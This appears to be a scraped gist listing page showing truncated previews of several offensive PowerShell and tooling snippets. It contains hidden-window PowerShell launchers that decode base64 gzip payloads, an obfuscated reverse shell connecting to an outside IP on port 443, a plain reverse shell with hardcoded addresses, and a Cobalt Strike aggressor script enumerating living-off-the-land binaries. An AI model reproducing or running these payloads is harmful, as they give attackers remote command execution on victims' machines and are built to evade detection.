This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAIyuYVoCA51WW2/bNhR+96848LRaQixCDTCgCJBiqZJuAbLWqNzmwTAQmjqOtcikR1K+IPF/HylRF8cJukwvtsjD73znOxfqFxiJDcp5wSGEW5lpjRxmO/hkfsaF5CjhHVzSNcKfVKa7Xs9YMp0JDn+gDm9xxvIMuYbeYw/M420YnMMX3IRfZ38j0xCOdyv8QpdoFjUx9nFpXxuT7wovcU6LXMcSU7OT0VwZCE/LAhurkRTbHXlmYdY7K7Vtb99SXNWh9R6h3B9RSZd+9X+SaJnx+6kXi+WS8nR4uJqonAn+bPFSbHguaFquBg5TCoZKgRNgKdIiR0vwdz+AyiSbg1+7gRD/gf4s42k/KDerc+XZPFNGfiP5uXG5M/+XxKqWCPaAWpExW904i+mH6EN0fJAoTaW2fp3nctel6Lxjd8EYrrQBrNLhV1T2r9GVuEap8JhxA91J+UvM45Fz1O8PLXXnr1dpprREurQEKzxiaisp1wyxllKVkoqRLY++y0CHj1J5UoO9QglZYcp8R5La1Hf+h97c1BEO/UdvbND3EFIFk4Mz33ApNMYodTbPGNX4g+ZZSm2xxTTPZ5Q9TIPgBTrkotALW6n20IVqxAg6aWpVaKPoyjSZ7TROplPP/toCiwg5jczz9OtjtHdKIk/rbX+icasJciZSW71nZxdJfH0dWHU/WRu/f2vKUGxUNQOSBeY5yIJzYw0m9kKZUuzDCXjI12f2jdtGPjFrJg3NBhPLVaHbzTsei9VOZvcLDX4cwGn0/jf4K2NSKDHXEAu5ErLUjMCF9WgtFUg0DtaYkjt+x12lOU2IHUzot |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@lolbins = @("Atbroker.exe","Bash.exe","Bitsadmin.exe","Cmstp.exe","Diskshadow.exe","Dnscmd.exe","Extexport.exe","Forfiles.exe","Gpscript.exe","Hh.exe","Ie4unit.exe","Ieexec.exe","Infdefaultinstall.exe","Installutil.exe","Mavinject.exe","Microsoft.Workflow.Compiler.exe","Msbuild.exe","Msconfig.exe","Msdt.exe","Mshta.exe","Msiexec.exe","Odbcconf.exe","Pcalua.exe","Pcwrun.exe","Presentationhost.exe","Regasm.exe","Register-cimprovider.exe","Regsvcs.exe","Regsvr32.exe","Rundll32.exe","Runonce.exe","Runscripthelper.exe","Schtasks.exe","Scriptrunner.exe","SyncAppvPublishingServer.exe","Wab.exe","Wmic.exe","Xwizard.exe"); | |
beacon_command_register("lolbin", "Queries the System for all major lolbin products installed", | |
"Syntax: lolbin\n" . | |
"Checks for installed lolbin products"); | |
alias lolbin { | |
$bid = $1; | |
$function = $2; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import json | |
from docx import Document | |
A_KEY = "" | |
S_KEY = "" | |
headers = {"X-ApiKeys": "accessKey=; secretKey="} | |
BASE_URL = "https://localhost:8834" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from selenium import webdriver | |
from selenium.webdriver.chrome.options import Options | |
from time import sleep | |
options = Options() | |
#options.add_argument("--headless") | |
driver = webdriver.Chrome(chrome_options=options,executable_path="chromedriver") | |
user_pass = "" # space seperated |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?XML version="1.0"?> | |
<scriptlet> | |
<registration remotable="True" version="1.0" desription="desription"> | |
<script language="VBScript"> | |
<![CDATA[ | |
Msgbox("Message") | |
]]> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
&('Sv') ("{0}{1}"-f 'Lh','aW3') ( [TypE]("{3}{1}{0}{2}" -F 'ENcOdI','ExT.','ng','T') ); ${CLi`E`NT} = &("{1}{0}{2}"-f '-Obje','New','ct') ("{0}{2}{1}{3}{4}"-f'System.Ne','s.T','t.Socket','CPCli','ent')(("{2}{0}{1}"-f '4.194','.214.53','5'),443);${str`E`AM} = ${Cl`i`EnT}.("{0}{2}{1}" -f'GetSt','m','rea').Invoke();[byte[]]${B`yTEs} = 0..65535|&('%'){0};while((${i} = ${sTr`eaM}.("{1}{0}"-f 'd','Rea').Invoke(${B`yT`eS}, 0, ${b`yt`eS}."le`NgTh")) -ne 0){;${d`Ata} = (.("{1}{0}{2}" -f 'ew-Obj','N','ect') -TypeName ("{5}{2}{4}{3}{0}{1}"-f'IEnco','ding','ystem.Text.','SCI','A','S')).("{1}{0}{3}{2}" -f'e','G','ing','tStr').Invoke(${b`y`TES},0, ${I});${Se`Nd`BAcK} = (.("{1}{0}"-f'x','ie') ${d`ATa} 2>&1 | &("{2}{0}{1}"-f'S','tring','Out-') );${sE`NDBAc`K2} = ${S`END`BacK} + "PS " + (&("{1}{0}"-f'wd','p'))."p`AtH" + "> ";${sE`N`DbyTE} = ( ( .('LS') ("{2}{1}{3}{0}{4}"-f 'ble:L','i','var','a','HAW3') )."v`ALuE"::"A`Scii").("{0}{1}"-f 'Get','Bytes').Invoke(${SEndb`A`c`k2});${sTRe`Am}.("{0}{1}"-f 'W','rite').Invoke($ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAKqwYVoCA51WXW/bNhR996+48LRaQixCMbohDZBirpJuAbLWqLzlwTAQWrqOtcikRlL+QOL/XlKiLDlO0GV6sUVennvuuR/UTzDiaxTzgoEPtyJVChnMtvBJ/4wLwVDAO7ikK4Q/qEi2nY62jFXKGfyOyr/FWZylyBR0HjugH2cdwwV8wbX/dfYPxgr88TbHL3SJelERbR+W9rUx+UviJc5pkalQYKJ3UppJDeEoUeDeaiT4ZkueWej11kpt29k1FPM6tM4jlPsjKujSrf5PIiVSdj91Qr5cUpb0D1cjmcWcPVu85GuWcZqUq57FFDxGKcEKsORJkaEh+JvrQWWSzsGt3YCP/0J3lrKk65Wb1bnybJZKLb+W/EK73Or/S2JUi3j8gEqScZzfWIvpWXAWHB8kUlGhjF/rudy1Kbpo2Q3jGHOlAat0uBWV3Wt0Ba5QSDxmvIdupfwl5uHIOuqefhiQ01/PyAcyeD/o9k0c1nmnElAqgXRp2FbgRBdaVK5plg2/Kj8VPVMrXZuOFjkps6gGe4UfxoWu+S2JalPX+u87c11U2HcfnbFG34FPJUwOznzDJVcYolDpPI2pwr9plibUVF5Is2xG44ep571AhwwLtTBlaw4N5cvKeK0ENpI0IbU1m8y2CifTqWN+TekFhAwC/Tz9/BjsrKzIknrbnSjcKIIs5omp6/PzYRReX3tG6k/Gxu3e6gLla1lNh2iBWQaiYExbgxaikLpIu3ACDrLVuXljpsVP9JrOyX4j5su8UM3mHQt5vhXp/UKBG3owCE5/gT/TWHDJ5wpCLnIuSgEJDI1HYylBoHaww |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIANOxYVoCA51W227bOBB991cMvNpaQixCcdvdIECKdZW0DZC2RuVtHgwDoaVxrI1MuiTlCxL/e0mJsuQ4QZvViy1yeObMmQv1Bwz4CsU0Z+DDtUiVQgaTDbzXP8NcMBTwCs7pEuETFcmm1dKWsUo5g4+o/GucxFmKTEHrvgX6cVYxnMEXXPlfJ/9hrMAfbhb4hc5RLyqi7cPCvjIm/0o8xynNMxUKTPROSjOpIRwlctxZDQRfb8gjC73eWKlsW9ua4qIKrXUPxf6ACjp3y/+jSImU3Y6dkM/nlCXd/dVIZjFnjxbP+YplnCbFqmcxBY9RSrACzHmSZ2gI/uN6UJqkU3ArN+DjD2hPUpa0vWKzPFeczVKp5deSn2mXG/1/ToxqEY/vUEkyjBdX1mJ8EpwEhweJVFQo49d6LnZtis4adv04xoXSgGU63JLK9jm6ApcoJB4y3kE3Uv4U83BgHbVfvyG9N6/J8d9vyclf7a6JwzpvlQJKJZDODdsSnOhCi4o1zbLmV+anpGdqpW3T0SAnZRZVYM/wwzjXNb8hUWXqWv9dZ6qLCrvuvTPU6FvwqYTR3plvOOcKQxQqnaYxVfidZmlCTeWFNMsmNL4be94TdEg/VzNTtuZQXz6tjNdIYC1JHVJTs9Fko3A0Hjvm15ReQEgv0M/Dn/fB1sqKLKm23ZHCtSLIYp6Yuj497Ufh5aVnpH5vbNz2tS5QvpLldIhmmGUgcsa0NWghcqmLtA1H4CBbnpo3Zlr8SK/pnOw2Yj5f5KrevGEhX2xEejtT4IYe9ILjt/A5jQWXfKog5GLBRSEggb7xaCwlCNQOl |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#A simple and small reverse shell. Options and help removed to save space. | |
#Uncomment and change the hardcoded IP address and port number in the below line. Remove all help comments as well. | |
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.126",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() | |
#$sm=(New-Object Net.Sockets.TCPClient("192.168.254.1",55555)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
vjTNELvUZXQAAAAAAAAClyVJtWzyZP1GJDNuHYs_9-MS182GzoVSkvYFYmH2-lOI |
NewerOlder